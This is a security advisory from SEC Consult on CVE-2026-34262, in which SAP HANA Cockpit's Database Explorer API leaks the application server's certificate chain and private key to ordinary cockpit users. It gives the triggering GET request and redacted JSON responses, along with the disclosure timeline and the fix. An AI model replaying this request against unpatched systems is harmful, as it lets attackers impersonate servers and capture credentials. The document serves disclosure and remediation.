📄 SAP HANA Cockpit / Database Explorer Private Key Disclosure

SEC Consult Vulnerability Lab Security Advisory < 20260415-0 >
    =======================================================================
                  title: Exposed Private Key of X.509 Certificate
                product: SAP HANA Cockpit & SAP HANA Database Explorer
     vulnerable version: HANA Cockpit <2.18.2 (HRTT <2.16.254002)
          fixed version: HANA Cockpit 2.18.2 (HRTT 2.16.254002)
             CVE number: CVE-2026-34262
                 impact: high
               homepage:https://www.sap.com/
                  found: 2025-04-24
                     by: Ben Samtleben (Office Berlin)
                         Bernd Kaufmann (Office Vienna)
                         SEC Consult Vulnerability Lab
    
                         An integrated part of SEC Consult, an Atos business
                         Europe | Asia
    
                         https://www.sec-consult.com
    
    =======================================================================
    
    Vendor description:
    -------------------
    "SAP is one of the world’s leading producers of software for the management
    of business processes."
    
    Source:https://www.sap.com/about/what-is-sap.html
    
    "SAP HANA cockpit is the main administration tool for SAP HANA. The SAP HANA
    cockpit provides tools for the administration and monitoring of SAP HANA
    databases (databases), and for development capabilities through the SAP
    HANA database explorer."
    
    Source:https://help.sap.com/docs/SAP_HANA_COCKPIT/df02d156db744412ad1f9e887aba68ad/ab5d442cc8a340fea07c15ef6f8eb537.html
    
    
    Business recommendation:
    ------------------------
    The vendor provides a patch which should be installed immediately, see
    SAP Security Note 3730639 (https://me.sap.com/notes/3730639.
    
    This patch does not completely mitigate the risk that the private keys were
    obtained by an attacker in the past. Therefore, SEC Consult strongly
    recommends rotating the affected X.509 certificates and corresponding private
    keys - even if this is currently not mentioned in the SAP Security Note.
    
    SEC Consult highly recommends to perform a thorough security review of the
    product conducted by security professionals to identify and resolve potential
    further security issues.
    
    
    Vulnerability overview/description:
    -----------------------------------
    1) Exposed Private Key of X.509 Certificate in SAP HANA Cockpit (CVE-2026-34262)
    SAP HANA Cockpit users with access to the Database Explorer can obtain the
    X.509 certificate issued to the application server and its corresponding
    private key. This information can be used to impersonate the application server
    on network level, allowing an attacker to obtain user credentials or other sensitive
    data. The issue arises if mutual TLS (mTLS) is configured for communication with the SAP HANA database.
    
    
    Proof of concept:
    -----------------
    1) Exposed Private Key of X.509 Certificate in SAP HANA Cockpit (CVE-2026-34262)
    When accessing the Database Explorer via the SAP HANA Cockpit, the following
    HTTP request is sent to the HRTT service in the background:
    
    GET /hrtt-service/sap/hana/cst/api/v2/databases HTTP/1.1
    Host: hana-cockpit-web-app.example.org:31033
    Cookie: JSESSIONID=[...]
    [...]
    
    The server response contains a list of all available databases.
    
    {
        "__count": 6,
        "d": {
            "results": [
                {
                    "__metadata": {
                        "uri": "/sap/hana/cst/api/v2/databases('C123456789')",
                        "type": "database.Database"
                    },
                    "id": "C123456789",
                    "group_id": 0,
                    "catalog_name": "SID@SID",
                    "type": "COCKPIT_RESOURCE",
                    "disabled": false,
                    "has_login": false,
                    "cockpit_resource_id": 123456789,
                    "database_product_name": "HANA",
                    "options": {
                        "schema_filter": "[]"
                    },
                    "set_xs_applicationuser": true,
                    "hdl_support_sof": false
                },
                // [... more entries here...]
            ]
        }
    }
    
    However, the response can vary - most likely depending on other HTTP requests
    that have been sent. A more verbose response can be triggered by manually
    interacting with the Database Explorer and then repeating the request.
    (No database credentials are needed.) Then, the following information is returned:
    
    {
        "__count": 6,
        "d": {
            "results": [
                {
                    "__metadata": {
                        "uri": "/sap/hana/cst/api/v2/databases('C123456789')",
                        "type": "database.Database"
                    },
                    "id": "C123456789",
                    "group_id": 0,
                    "catalog_name": "SID@SID",
                    "type": "COCKPIT_RESOURCE",
                    "disabled": false,
                    "has_login": false,
                    "cockpit_resource_id": 123456789,
                    "database_product_name": "HANA",
                    "cockpit_resource_name": "SID@SID",
                    "options": {
                        "hosts": [
                            {
                                "host": "isidhdb01.example.org",
                                "port": "31013"
                            }
                        ],
                        "databaseName": "SID",
                        "encrypt": true,
                        "ca": [
                            "-----BEGIN CERTIFICATE-----\nMII[... certificate removed ...]zg==\n-----END CERTIFICATE-----\n",
                            "-----BEGIN CERTIFICATE-----\nMII[... certificate removed ...]c4=\n-----END CERTIFICATE-----\n",
                        ],
                        "sslValidateCertificate": true,
                        "key": [
                            "-----BEGIN PRIVATE KEY-----MII[... private key removed ...]8tQ==-----END PRIVATE KEY-----"
                        ],
                        "cert": [
                            "-----BEGIN CERTIFICATE-----MII[... certificate removed ...]QHvC-----END CERTIFICATE----------BEGIN CERTIFICATE-----MII[...]yotP-----END CERTIFICATE-----"
                        ],
                        "schema_filter": "[]"
                    },
                    "set_xs_applicationuser": true,
                    "hdl_support_sof": false
                }
                // [... more entries here...]
            ]
        }
    }
    
    The HTTP response does not only leak additional metadata, but most importantly an X.509
    certificate chain and the private key of the leaf certificate. This certificate is issued
    to the application server hosting the SAP HANA Cockpit, not to the database server.
    
    The vulnerability can be reproduced with the Cockpit Administrator and the Cockpit User role,
    so it does not require administrative privileges.
    
    
    Vulnerable / tested versions:
    -----------------------------
    The following versions are affected:
    * SAP HANA Cockpit versions prior to 2.18.2 (SAP HANA Runtime Tools prior to 2.16.254002)
    
    
    Vendor contact timeline:
    ------------------------
    2025-07-01: Contacting vendor through vulnerability submission web form, receiving
                automatic confirmation.
    2025-10-13: Recontacting vendor via email after no response.
    2025-10-17: Vendor responds, declaring the issue "resolved" by Aug 30 without
                further details.
    2025-10-29: Inquiring about assigned CVE or SAP Security Note.
    2025-11-12: Sending reminder after no response.
    2025-11-28: Sending another reminder, still no response.
    2025-12-03: Vendor responds with the version containing the patch; states that
                no CVE will be assigned.
    2025-12-05: Contacting vendor, emphasizing that SAP Security Note and CVE are
                essential to inform customers and make them rotate their certificates.
    2025-12-10: Vendor responds, requesting time to clarify with internal stakeholders.
    2026-02-11: Contacting the vendor again, asking for any updates.
    2026-02-12: Vendor responds, reiterating patched version, no mention of SAP Security
                Note or CVE.
    2026-02-12: Reminding vendor of importance of notifying affected customers due to
                required certificate rotation.
    2026-02-25: Contacting MITRE regarding CVE assignment dispute.
    2026-02-27: Vendor agrees to issuing SAP Security Note and asks to wait with public disclosure.
    2026-04-14: SAP Security Note 3730639 (CVE-2026-34262) is published by the vendor.
    2026-04-15: Public release of advisory
    
    
    Solution:
    ---------
    According to SAP, the vulnerability was fixed in SAP HANA Cockpit version 2.18.2 (HRTT version 2.16.254002).
    For information on the available patch, please see SAP Security Note 3730639 (https://me.sap.com/notes/3730639).
    
    However, this does not completely mitigate the risk that the private keys were
    obtained by an attacker in the past. Therefore, SEC Consult strongly recommends
    rotating the affected X.509 certificates and corresponding private keys -
    even if this is currently not mentioned in the SAP Security Note.
    
    
    Workaround:
    -----------
    None
    
    
    Advisory URL:
    -------------
    https://sec-consult.com/vulnerability-lab/
    
    
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    
    SEC Consult Vulnerability Lab
    An integrated part of SEC Consult, an Atos business
    Europe | Asia
    
    About SEC Consult Vulnerability Lab
    The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an
    Atos business. It ensures the continued knowledge gain of SEC Consult in the
    field of network and application security to stay ahead of the attacker. The
    SEC Consult Vulnerability Lab supports high-quality penetration testing and
    the evaluation of new offensive and defensive technologies for our customers.
    Hence our customers obtain the most current information about vulnerabilities
    and valid recommendation about the risk profile of new technologies.
    
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    Interested to work with the experts of SEC Consult?
    Send us your applicationhttps://sec-consult.com/career/
    
    Interested in improving your cyber security with the experts of SEC Consult?
    Contact our local officeshttps://sec-consult.com/contact/
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    
    Mail: security-research at sec-consult dot com
    Web:https://www.sec-consult.com
    Blog:https://blog.sec-consult.com
    X:https://x.com/sec_consult
    
    EOF Ben Samtleben, Bernd Kaufmann / @2026